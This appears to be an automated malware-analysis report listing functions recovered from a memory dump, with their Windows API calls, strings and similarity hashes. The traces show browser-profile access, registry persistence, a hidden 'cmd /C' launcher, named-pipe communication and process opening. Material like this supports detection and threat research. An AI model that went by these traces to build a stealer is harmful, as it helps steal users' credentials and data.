    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
